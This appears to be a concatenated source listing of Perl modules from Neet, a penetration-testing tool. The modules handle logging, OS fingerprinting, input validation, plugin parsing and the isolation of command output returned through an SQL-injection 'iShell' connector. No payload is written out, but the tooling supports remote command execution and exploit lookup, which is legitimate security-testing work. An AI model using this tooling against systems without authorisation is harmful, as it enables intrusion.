  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"ConnectorSQLInject")){
    return $reg->Register("Type"=>"iShellConnector","Object"=>"SQLInject","Module"=>"ConnectorSQLInject");
  }
  return 0;
}

1;



--------------------------------------------------------------------------------
/content/main/JR/iShell/OutputIsolator.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# JR::OutputIsolator.pm

# Jonathan Roach

use strict;

package JR::iShell::OutputIsolator;


sub new {
  my $PKG=shift();
  my (@HTML,@Tokens,$SHTML,%HTMLObj);
  my @Containers=("html","head","title","body","table","td","tr","div","pre");
  $HTMLObj{'Raw'}=\@HTML;
  $HTMLObj{'Tokens'}=\@Tokens;
  $HTMLObj{'Page'}=\$SHTML;
  $HTMLObj{'Calibrated'}=0;
  $HTMLObj{'Index'}=0;
  $HTMLObj{'Containers'}=\@Containers;
  my $Object=\%HTMLObj;
  bless $Object, $PKG;
  return $Object;
}

sub LoadPage {
  my $obj=shift();
  my $serial;
  @{$$obj{'Raw'}}=(@_);
  for my $line (@{$$obj{'Raw'}}){
    $serial .= $line if ($line);
  }
  $$obj{'Page'}=$serial;
}

sub Calibrate {
  my $obj=shift();
  my $string=lc(shift());
  my $lcpage=lc($$obj{'Page'});
  if ($lcpage !~ /$string/){
    $obj->FlushPage;
    die ("****CANNOT CALIBRATE ****\n$lcpage\n****CANNOT CALIBRATE ****\n" .
      "The required output string was not found in the returned HTML\n");
  }
  $obj->_SerialisedTokenise($lcpage);
  for my $token (@{$$obj{'Tokens'}}){
    last if ("$token" eq "$string");
    for my $cont (@{$$obj{'Containers'}}){
      if ($token =~ /<$cont[\s>]/){
        $$obj{'Index'}++;
        last;
      }
    }
  }

  $obj->isCalibrated(1) if ($$obj{'Index'} > 0);
  $obj->FlushPage;
}

sub FlushPage {
  my $obj=shift();
  @{$$obj{'Tokens'}}=();
  @{$$obj{'Raw'}}=();
  $$obj{'Page'}="";
  return 1;
}

sub GetOutput {
  my $obj=shift();
  return undef if (!$$obj{'Page'});
  $obj->_SerialisedTokenise($$obj{'Page'});
  my $count=0; my $tkindex=0;
  for my $token (@{$$obj{'Tokens'}}){
    if ($token =~ /Directory of/){
      # This is one with NO HTML. Let's get out of here
      $token =~ s/\r//g;
      my @out= split "\\n", $token;
      $obj->FlushPage;
      return @out;
    }
    for my $cont (@{$$obj{'Containers'}}){
      if (lc($token) =~ /<$cont[\s>]/){
        $count++;
        last;
      }
    }
    last if ($count == $$obj{'Index'});
    $tkindex++;
  }

  return $$obj{'Page'} if (!$tkindex);
  return ("") if (!${$$obj{'Tokens'}}[$tkindex+1] || $obj->isClosingTag(${$$obj{'Tokens'}}[$tkindex+1]) || (${$$obj{'Tokens'}}[$tkindex+1] !~ /\S/));
  ${$$obj{'Tokens'}}[$tkindex+1] =~ s/\r//g;
  my @out= split "\\n", ${$$obj{'Tokens'}}[$tkindex+1];
  $obj->FlushPage;
  return @out;
}


sub isClosingTag {
  my $obj=shift();
  my $tag=shift();
  my $is=0;
  for my $cont (@{$$obj{'Containers'}}){
    if (lc($tag) =~ /<\/$cont[\s>]/){
      $is=1;
      last;
    }
  }
  return $is;
}

sub _SerialisedTokenise {
  my $obj=shift();
  my $html=shift();
  @{$$obj{'Tokens'}}=();
  my $current;
  for (my $a=0; $a < length($html); $a++){
    my $c=substr($html,$a,1);
    if ("$c" eq "<"){
      if ($current){
        push @{$$obj{'Tokens'}}, $current;
        $current="";
      }
    }
    if ("$c" eq ">"){
      $current .= $c;
      push @{$$obj{'Tokens'}}, $current;
      $current="";
      next;
    }
    $current .= $c;
    if ($a > 20 && $current && $current =~ /Directory of/){
      @{$$obj{'Tokens'}}=();
      push @{$$obj{'Tokens'}}, $html;
      last;
    }
  }
}

sub isCalibrated {
  my $Obj=shift();
  my $newval=shift();
  if ($newval){
    $$Obj{'Calibrated'}=1;
    return 1;
  } else {
    return $$Obj{'Calibrated'};
  }
}


sub register {
  # Gets called at installation time
  eval {
    require JR::Catalog;
  };
  if ($@){
    print STDERR "Couldn't load JR::Catalog. Didn't register.\n";
    return 0;
  }
  my $reg=Catalog->new;
  if (!$reg->isRegistered("Module"=>"OutputIsolator")){
    return $reg->Register("Type"=>"OutputIsolator","Object"=>"OutputIsolator","Module"=>"OutputIsolator");
  }
  return 0;
}

1;

--------------------------------------------------------------------------------
/content/main/Neet/Logging.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# Logging.pm

# Logging for Neet
# Jonathan Roach
package Neet::Logging;

use Term::ANSIColor qw(:constants);
$Term::ANSIColor::AUTORESET = 1;
use Fcntl ':flock';

sub new {
  my $pkg=shift();
  my %Logger;
  $Logger{'LogFile'}="Logfile";
  $Logger{'Logging'}=0;
  $Logger{'AltColour'}=0;
  $Logger{'Linestamp'}=0;
  my $self=\%Logger;
  bless $self, $pkg;
  return $self;
}

sub LogFile {
  my $self=shift();
  my $file=shift();
  if (!$file){
    return $$self{'LogFile'};
  } else {
    $$self{'LogFile'}=$file;
    return 1;
  }
}

sub AltColour {
  my $self=shift();
  my $alt=shift();
  if (!defined($alt)){
    return $$self{'AltColour'};
  } else {
    $$self{'AltColour'}=$alt;
    return 1;
  }
}

sub Linestamp {
  my $self=shift();
  my $alt=shift();
  if (!defined($alt)){
    return $$self{'Linestamp'};
  } else {
    $$self{'Linestamp'}=$alt;
    return 1;
  }
}

sub OpenLog {
  my $self=shift();
  my $direct=shift();
  my $FH;
  # Three-argument open: the log file name is taken literally and never parsed for a mode
  if (open($FH,'>>',$$self{'LogFile'})){
    $$self{'LOGHANDLE'}=$FH;
    $$self{'Logging'}=1;
    if (!$direct){
      $self->Log ("- - - - - - - - - - - -\n");
      $self->Log ("Log opened by PID $$\n");
    }
    return 1;
  } else {
    return 0;
  }
}

sub CloseLog {
  my $self=shift();
  my $direct=shift();
  if ($$self{'Logging'}){
    if (!$direct){
      $self->Log ("Log closed\n");
    }
    my $FH=$$self{'LOGHANDLE'};
    close $FH;
    return 1;
  }
return 0; 107 | } 108 | 109 | sub Logging { 110 | my $self=shift(); 111 | return $$self{'Logging'}; 112 | } 113 | 114 | sub LogNoStamp { 115 | my $self=shift(); 116 | return 0 if (!$$self{'Logging'}); 117 | my $entry=shift(); 118 | my $FH=$$self{'LOGHANDLE'}; 119 | chomp $entry; $entry .= "\n"; 120 | print $FH $entry; 121 | return 1; 122 | } 123 | 124 | sub Log { 125 | my $self=shift(); 126 | my $message=shift(); 127 | return 0 if (!$$self{'Logging'}); 128 | $message =~ s/--+//g; 129 | chomp $message; $message .= "\n"; 130 | my $FH=$$self{'LOGHANDLE'}; 131 | my $entry=localtime() . ": $message"; 132 | flock($FH,LOCK_EX); 133 | print $FH $entry; 134 | flock($FH,LOCK_UN); 135 | return 1; 136 | } 137 | 138 | sub Error { 139 | my $self=shift(); 140 | my $text=shift(); 141 | my $direct=shift(); 142 | my ($print,$log)=(1,1); 143 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 144 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 145 | $self->Log("[ERROR] $text") if ($log); 146 | chomp $text; $text .= "\n"; 147 | if ($print){ 148 | if ($$self{'Linestamp'}){ 149 | print STDERR localtime() . " ERROR: $text"; 150 | } else { 151 | print STDERR "ERROR: $text"; 152 | } 153 | } 154 | } 155 | 156 | sub Debug { 157 | my $self=shift(); 158 | my $text=shift(); 159 | my $direct=shift(); 160 | my ($print,$log)=(1,1); 161 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 162 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 163 | $self->Log("[DEBUG] $text") if ($log); 164 | chomp $text; $text .= "\n"; 165 | if ($print){ 166 | if ($$self{'Linestamp'}){ 167 | print YELLOW localtime() . 
" [DEBUG] $text"; 168 | } else { 169 | print YELLOW "[DEBUG] $text"; 170 | } 171 | } 172 | } 173 | 174 | sub Memo { 175 | my $self=shift(); 176 | my $text=shift(); 177 | $self->Log("[MEMO] $text"); 178 | } 179 | 180 | sub Warn { 181 | my $self=shift(); 182 | my $text=shift(); 183 | my $direct=shift(); 184 | my ($print,$log)=(1,1); 185 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 186 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 187 | $self->Log("[WARN] $text") if ($log); 188 | chomp $text; $text .= "\n"; 189 | if ($print){ 190 | if ($$self{'Linestamp'}){ 191 | print RED localtime() . " $text"; 192 | } else { 193 | print RED "$text"; 194 | } 195 | } 196 | } 197 | 198 | sub Vuln { 199 | my $self=shift(); 200 | my $text=shift(); 201 | my $direct=shift(); 202 | my ($print,$log)=(1,1); 203 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 204 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 205 | $self->Log("[VULN] $text") if ($log); 206 | chomp $text; $text .= "\n"; 207 | if ($print){ 208 | if ($$self{'Linestamp'}){ 209 | print RED localtime() . " [VULN]*** -> $text"; 210 | } else { 211 | print RED "[VULN]*** -> $text"; 212 | } 213 | } 214 | } 215 | 216 | sub Issue { 217 | my $self=shift(); 218 | my $text=shift(); 219 | my $direct=shift(); 220 | my ($print,$log)=(1,1); 221 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 222 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 223 | $self->Log("[ISSUE] $text") if ($log); 224 | chomp $text; $text .= "\n"; 225 | if ($print){ 226 | if ($$self{'Linestamp'}){ 227 | print RED localtime() . 
" [ISSUE] -> $text"; 228 | } else { 229 | print RED "[ISSUE] -> $text"; 230 | } 231 | } 232 | } 233 | 234 | sub Comp { 235 | my $self=shift(); 236 | my $text=shift(); 237 | my $direct=shift(); 238 | my ($print,$log)=(1,1); 239 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 240 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 241 | $self->Log("[COMP] $text") if ($log); 242 | chomp $text; $text .= "\n"; 243 | if ($print){ 244 | if ($$self{'Linestamp'}){ 245 | print RED localtime() . " [COMP]*** -> $text"; 246 | } else { 247 | print RED "[COMP]*** -> $text"; 248 | } 249 | } 250 | } 251 | 252 | sub OK { 253 | my $self=shift(); 254 | my $text=shift(); 255 | my $direct=shift(); 256 | my ($print,$log)=(1,1); 257 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 258 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 259 | $self->Log("[OK] $text") if ($log); 260 | chomp $text; $text .= "\n"; 261 | if ($print){ 262 | if ($$self{'Linestamp'}){ 263 | print GREEN localtime() . " $text"; 264 | } else { 265 | print GREEN "$text"; 266 | } 267 | } 268 | } 269 | 270 | sub Info { 271 | my $self=shift(); 272 | my $text=shift(); 273 | my $direct=shift(); 274 | my ($print,$log)=(1,1); 275 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 276 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 277 | $self->Log("[INFO] $text") if ($log); 278 | chomp $text; $text .= "\n"; 279 | if ($print){ 280 | if ($$self{'AltColour'}==0){ 281 | if ($$self{'Linestamp'}){ 282 | print WHITE localtime() . " $text"; 283 | } else { 284 | print WHITE "$text"; 285 | } 286 | } else { 287 | if ($$self{'Linestamp'}){ 288 | print BLACK localtime() . 
" $text"; 289 | } else { 290 | print BLACK "$text"; 291 | } 292 | } 293 | } 294 | } 295 | 296 | sub Status { 297 | my $self=shift(); 298 | my $text=shift(); 299 | my $direct=shift(); 300 | my ($print,$log)=(1,1); 301 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 302 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 303 | $self->Log("[STAT] $text") if ($log); 304 | chomp $text; $text .= "\n"; 305 | if ($print){ 306 | if ($$self{'Linestamp'}){ 307 | print BLUE localtime() . " $text"; 308 | } else { 309 | print BLUE "$text"; 310 | } 311 | } 312 | } 313 | 314 | sub Alert { 315 | my $self=shift(); 316 | my $text=shift(); 317 | my $direct=shift(); 318 | my ($print,$log)=(1,1); 319 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 320 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 321 | $self->Log("[ALERT] $text") if ($log); 322 | chomp $text; $text .= "\n"; 323 | if ($print){ 324 | if ($$self{'Linestamp'}){ 325 | print RED localtime() . " [ALERT] $text"; 326 | } else { 327 | print RED "[ALERT] $text"; 328 | } 329 | } 330 | } 331 | 332 | sub Exec { 333 | my $self=shift(); 334 | my $text=shift(); 335 | $self->Log("[EXEC] $text"); 336 | } 337 | 338 | 1; 339 | -------------------------------------------------------------------------------- /content/main/Neet/OSDetect.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

#OSDetect.pm

package Neet::OSDetect;

sub new {
  my $pkg=shift();
  my $file=shift();
  # Store the signatures in memory - cut down on disk accesses
  my (%OSD,@Sigs);
  if (open(FH,$file)){
    until (eof FH){
      my $line = readline(*FH);
      if ($line =~ /^\s/){
        $line =~ s/^\s+//g;
      }
      if (($line =~ /^\#/) || ($line !~ /\w/) || ($line !~ /\*/)) {
        next;
      }
      chomp $line;
      push @Sigs, "$line";
    }
    close FH;
  } else {
    return undef;
  }
  $OSD{'Sigs'}=\@Sigs;
  my $self = \%OSD;
  bless $self, $pkg;
  return $self;
}

sub BannerToOS {
  my $self=shift();
  my $service=shift();
  my $banner=shift();
  if (!defined($banner)){
    return undef;
  }
  $banner =~ s/\W//g;
  my ($type,$family,$famconf,$version,$verconf,$servicepack,$spconf);
  my $c=0;

  # Work out the OS family first
  for my $sig (@{$$self{'Sigs'}}){
    next if ($sig !~ /^$service\*/);
    my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig);
    $b =~ s/\W//g;
    next if ($banner !~ /$b/);
    ($s,$b)=("","");
    if ($fc && ($fc > $c)){
      $family=$fa;
      $type=$ty;
      $famconf=$fc;
      $c=$fc;
    }
  }

  return undef if (!$type);

  # Work out the version next
  if ($family){
    $c=0;
    for my $sig (@{$$self{'Sigs'}}){
      next if ($sig !~ /^$service\*/);
      my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig);
      next if ("$fa" ne "$family");
      $b =~ s/\W//g;
      next if ($banner !~ /$b/);
      ($s,$b)=("","");
      if ($vc && ($vc > $c)){
        $version=$ve;
        $verconf=$vc;
        $c=$vc;
      }
    }
  }

  # Work out the service pack next
  if ($version){
    $c=0;
    for my $sig (@{$$self{'Sigs'}}){
      next if ($sig !~ /^$service\*/);
      my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig);
      next if ("$fa" ne "$family") || ("$ve" ne "$version");
      $b =~ s/\W//g;
      next if ($banner !~ /$b/);
      ($s,$b)=("","");
      if ($sc && ($sc > $c)){
        $servicepack=$sp;
        $spconf=$sc;
        $c=$sc;
      }
    }
  }

  return ($type,$family,$famconf,$version,$verconf,$servicepack,$spconf);
}

sub HashToOS {
  my $self=shift();
  my $hash=shift();
  my ($type,$family,$fconf,$version,$vconf,$servicepack,$sconf,%sort,@values);
  # Scores are kept in the lexical %sort declared above. Writing $$sort{...}
  # instead would use an unrelated package variable that %sort=() never
  # clears, so scores would leak between phases and between calls.

  # Add up the scores and determine OS family first
  for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){
    my ($_type,$_family,$_fconf);
    $_type=$$hash{$i}{'type'}; $_family=$$hash{$i}{'family'}; $_fconf=$$hash{$i}{'fconf'};
    #print "Type $_type Fam $_family Confidence $_fconf\n";
    if ($sort{$_family}{'c'}){
      $sort{$_family}{'c'} += $_fconf;
    } else {
      $sort{$_family}{'c'} = $_fconf;
      $sort{$_family}{'t'} = $_type;
      push @values, $_family;
    }
  }
  #print "Sorting Family\n";
  my $c=0;
  for my $fam (@values){
    #print "$fam (" . $sort{$fam}{'t'} . ") " . $sort{$fam}{'c'} . "\n";
    if ($sort{$fam}{'c'} > $c){
      $family=$fam;
      $type=$sort{$fam}{'t'};
      $fconf=$sort{$fam}{'c'};
      $c=$sort{$fam}{'c'};
    }
  }

  return undef if (!$family);
  #print "Chosen $family\n";

  # Now choose the version
  $#values=-1; %sort=();
  for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){
    my ($_family,$_version,$_vconf);
    $_family=$$hash{$i}{'family'}; $_version=$$hash{$i}{'version'}; $_vconf=$$hash{$i}{'vconf'};
    next if ((!$_version) || ("$_family" ne "$family"));
    #print "Fam $_family Ver $_version Confidence $_vconf\n";
    if ($sort{$_version}{'c'}){
      $sort{$_version}{'c'} += $_vconf;
    } else {
      $sort{$_version}{'c'} = $_vconf;
      push @values, $_version;
    }
  }
  #print "Sorting Version\n";
  $c=0;
  for my $ver (@values){
    #print "$ver " . $sort{$ver}{'c'} . "\n";
    if ($sort{$ver}{'c'} > $c){
      $version=$ver;
      $vconf=$sort{$ver}{'c'};
      $c=$sort{$ver}{'c'};
    }
  }

  if ($version){
    #print "Chosen $version\n";
    # Now choose the service pack
    $#values=-1; %sort=();
    for (my $i=0; $i< $$hash{'index'}{'0'}; $i++){
      my ($_family,$_version,$_servicepack,$_sconf);
      $_family=$$hash{$i}{'family'}; $_version=$$hash{$i}{'version'}; $_servicepack=$$hash{$i}{'servicepack'}; $_sconf=$$hash{$i}{'sconf'};
      next if ((!$_servicepack) || ("$_version" ne "$version") || ("$_family" ne "$family"));
      #print "Fam $_family Ver $_version ServicePack $_servicepack Confidence $_sconf\n";
      if ($sort{$_servicepack}{'c'}){
        $sort{$_servicepack}{'c'} += $_sconf;
      } else {
        $sort{$_servicepack}{'c'} = $_sconf;
        push @values, $_servicepack;
      }
    }
    #print "Sorting ServicePack\n";
    $c=0;
    for my $sp (@values){
      #print "$sp " . $sort{$sp}{'c'} . "\n";
      if ($sort{$sp}{'c'} > $c){
        $servicepack=$sp;
        $sconf=$sort{$sp}{'c'};
        $c=$sort{$sp}{'c'};
      }
    }
    #print "Chosen $servicepack\n";
  }
  return ($type,$family,$fconf,$version,$vconf,$servicepack,$sconf);
}

sub Unload {
  my $self=shift();
  # Empty the signature list held by the object ($$self, not an unrelated %self)
  $#{$$self{'Sigs'}}=-1;
  return undef;
}


1;

--------------------------------------------------------------------------------
/content/main/Neet/Util.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

# Util.pm

# Miscellaneous functions for Neet
# Jonathan Roach
# April 2006
# Version

# User input
sub OLDGetKey {
  # Nasty hack to work with ubuntu (Jan 2007)
  my $key=`/bin/bash -c 'read -sn1 result 2>/dev/null && echo \$result'`;
  chomp $key;
  return $key;
}

sub GetKey {
  ReadMode 3;
  my $key = ReadKey 0;
  ReadMode 0;
  return $key;
}

sub GetLine {
  my $line;
  # Keep reading standard input until a line with non-whitespace arrives
  until ($line && $line =~ /\S/){
    $line=<STDIN>;
  }
  return $line;
}

sub GetLineNWS {
  my $line=GetLine();
  $line =~ s/\n//g;
  $line =~ s/\s/_/g;
  return $line;
}

sub PageSeparator {
  print "\n" . "-" x 80 . "\n" . "-" x 80 . "\n\n";
  return 1;
}

sub Stamp {
  my $stamp=`date`;
  chomp $stamp;
  return $stamp;
}

sub Mid {
  my $line=shift();
  $line =~ s/\n$//;
  my ($width,@junk)=GetTerminalSize();
  $width=80 if (!$width);
  if (length($line)<($width-3)){
    $line = " $line ";
    if (length($line) % 2 > 0){
      $line .= " ";
    }
    my $padsize=($width-length($line))/2;
    $line = "-" x $padsize . $line . "-" x $padsize . "\n";
    return $line;
  } else {
    return $line;
  }
}


#************************************************
# Port and Address specification validation
#************************************************
sub IsPortSpec {
  my $spec=shift();
  return 1 if ($spec =~ /^\d+[-,]??\d+$/);
  return 0;
}

sub IsIPSpec {
  my $spec=shift();
  my $status=1;
  if (!defined($spec)){
    return $status;
  }
  if ($spec !~ /\//){
    # Absolute range
    my @octets=split "\\.", $spec;
    return 0 if ($#octets != 3);
    for my $octet (@octets){
      my ($a,$b)=split("-",$octet);
      if ($b){
        $status=0 if ($b !~ /^\d{1,3}$/);
        $status=0 if (($b > 255) || ($b <= $a));
      } else {
        $status=0 if ($octet =~ /-/);
      }
      if ("$a" ne "*"){
        $status=0 if ($a !~ /^\d{1,3}$/);
        $status=0 if ($status && (($a < 0) || ($a > 255)));
      }
    }
  } else {
    # CIDR notation
    my ($net,$mask)=split "/", $spec;
    $status=IsIPSpec($net);
    if ($status){
      if (!IsIPSpec($mask)){
        if (!(($mask =~ /^\d+$/) && ($mask > 0) && ($mask < 33))){
          $status=0;
        }
      }
    }
  }
  return $status;
}

sub IsIPRange {
  my $range=shift();
  if ($range =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\-\d{1,3}$/){
    return 1;
  } else {
    return 0;
  }
}

# ***************
# Toolkit Testing
# ***************

sub HaveTool {
  my $tool=shift();
  # $tool is interpolated into a shell command, so accept only an allow-list
  # of characters. A deny-list of metacharacters misses ; ` $ and quotes.
  return 0 if (!$tool || ($tool !~ /^[\w.+\/-]+$/));
  my $r=system ("type $tool >/dev/null 2>&1");
  $r=$r>>8;
  return 1 if (!$r);
  return 0;
}

sub ToolVersion {
  my $tool=shift();
  # Same allow-list as HaveTool: both values reach the shell via backticks
  return 0 if (!$tool || ($tool !~ /^[\w.+\/-]+$/));
  my $versionflag=shift();
  return 0 if (!$versionflag || ($versionflag !~ /^[\w.+\/=-]+$/));
  my $versionrx=shift();
  $versionrx="\\d{1,}\\.\\d{1,}[\\.\\d{1,}]??" if (!$versionrx);
  my @v=`$tool $versionflag 2>&1`;
  my $version;
  for my $l (@v){
    next if (!$l || ($l !~ /\S/));
    if ($l =~ /$versionrx/){
      $version=$l;
      $version =~ s/[\s\S]+($versionrx)[\s\S]+/$1/g;
      return $version;
    }
  }
  return 0;
}

sub ToolCheck {
  my $tool=shift();
  # Allow-list of characters: the name ends up in shell commands run by
  # HaveTool and ToolVersion, and a deny-list misses ; ` $ and quotes.
  return 0 if (!$tool || ($tool !~ /^[\w.+\/-]+$/));
  if (HaveTool($tool)){
    my $version = ToolVersion($tool,'-V');
    print "Got $tool version $version\n";
  } else {
    print "$tool not installed or not in \$PATH\n";
  }
}

# ******************
# Neet Plugin XML file parsing
# ******************

package NeetXML;

use XML::Parser;

sub new {
  my $PKG=shift();
  my $file=shift();
  my %XML=();
  # Parse the XML plugins data file
  no warnings;
  my %tmp=();
  my %batch=();

  sub _xml_start {
    my( $expat, $element, %attrs ) = @_;
    if(("$element" eq "plugin") && %attrs ) {
      %tmp=%attrs;
    }
    if(("$element" eq "batch") && %attrs ) {
      %batch=%attrs;
    }
  }

  sub _xml_char {
    my( $expat, $data ) = @_;
    if ($data =~ /\S/){
      $XML{"$data"}{'desc'}=$tmp{'desc'} if ($tmp{'desc'});
      $XML{"$data"}{'msref'}=$tmp{'msref'} if ($tmp{'msref'});
      $XML{"$data"}{'cve'}=$tmp{'cve'} if ($tmp{'cve'});
      $XML{"$data"}{'bid'}=$tmp{'bid'} if ($tmp{'bid'});
      $XML{"$data"}{'type'}=$tmp{'type'} if ($tmp{'type'});
      $XML{"$data"}{'msf_exploit'}=$tmp{'msf_exploit'} if ($tmp{'msf_exploit'});
      $XML{"$data"}{'enabled'}=$tmp{'enabled'} if ($tmp{'enabled'});
      $XML{"$data"}{'data'}=$tmp{'data'} if ($tmp{'data'});
      $XML{"$data"}{'safe'}=$tmp{'safe'} if ($tmp{'safe'});
    }
  }

  my $parser = XML::Parser->new( 'Handlers' =>
    {
      'Start'=>\&_xml_start,
      'Char'=>\&_xml_char,
    });

  $parser->parsefile("$file");

  my $xmlobj=\%XML;
  bless $xmlobj, $PKG;
  return $xmlobj;
}

sub plugins {
  my $self=shift();
  my @plugins;
  for my $plugin (keys(%{$self})){
    push @plugins, $plugin if ("$plugin" ne "batch");
  }
  return @plugins;
}

sub batch {
  my $self=shift();
  return $$self{'batch'}{'data'};
}

sub desc {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'desc'};
}

sub type {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'type'};
}
sub msref {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'msref'};
}
sub cve {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'cve'};
}
sub bid {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'bid'};
}
sub msf_exploit {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'msf_exploit'};
}
sub isSafe {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'safe'};
}
sub enabled {
  my $self=shift();
  my $plugin=shift();
  return $$self{"$plugin"}{'enabled'};
}

1;

--------------------------------------------------------------------------------
/content/main/Neet/VceConfig.pm:
--------------------------------------------------------------------------------
##########################################################################
#
# Neet: Network discovery, enumeration and security assessment tool
# Copyright (C) 2008-2016 Jonathan Roach
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# Contact: jonnyhightower [at] funkygeek.com
#
##########################################################################

package Neet::VceConfig;

sub new {
  my $pkg=shift();
  my $file=shift();
  my %data;
  my %section;
  my $self=\%data;
  my $id=0;
  if (open(VE,$file)){

    until (eof VE){
      my $line=readline(*VE);
      next if ($line !~ /^[\w\[]/);
      if ($line =~ /^\[CHECK\]/){
        addConf();
        next;
      }
      chomp $line;
      my ($key,$value)=split (" ", $line ,2);
      $section{$key}=$value;
    }
    close VE;
    addConf();
  } else {
    return undef;
  }

  sub addConf {
    no warnings;
    if ($section{'name'}){
      for my $key (keys(%section)){
        $data{$id}{$key}=$section{$key};
      }
      $id++;
      $data{'total'}=$id;
    }
    %section=();
  }
  bless $self, $pkg;
  return $self;
}

sub totalChecks {
  my $self=shift();
  return $$self{'total'};
}

sub AllChecks {
  my $self=shift();
  my $type=shift();
  my @keys;
  for (my $id=0; $id < $$self{'total'}; $id++){
    if ($type){
      my $t=$self->Type($id);
      next if ("$t" ne "$type");
    }
    push @keys, $id;
  }
  return @keys;
}

sub Checks {
  my $self=shift();
  my $type=shift();
  my @keys;
  for (my $id=0; $id < $$self{'total'}; $id++){
    next if (! $self->Enabled($id));
    if ($type){
      my $t=$self->Type($id);
      next if ("$t" ne "$type");
    }
    push @keys, $id;
  }
  return @keys;
}

sub Type {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'type'};
}
sub Name {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'name'};
}
sub Label {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'label'};
}
sub Desc {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'desc'};
}
sub Xterm {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'xterm'};
}
sub Udpport {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'udpport'};
}
sub Tcpport {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'tcpport'};
}
sub Enabled {
  my $self=shift();
  my $id=shift();
  if ($$self{$id}{'enabled'} == "1"){
    return 1;
  }
  return 0;
}

sub Msref {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'msref'};
}
sub Cve {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'cve'};
}
sub Bid {
  my $self=shift();
  my $id=shift();
  return $$self{$id}{'bid'};
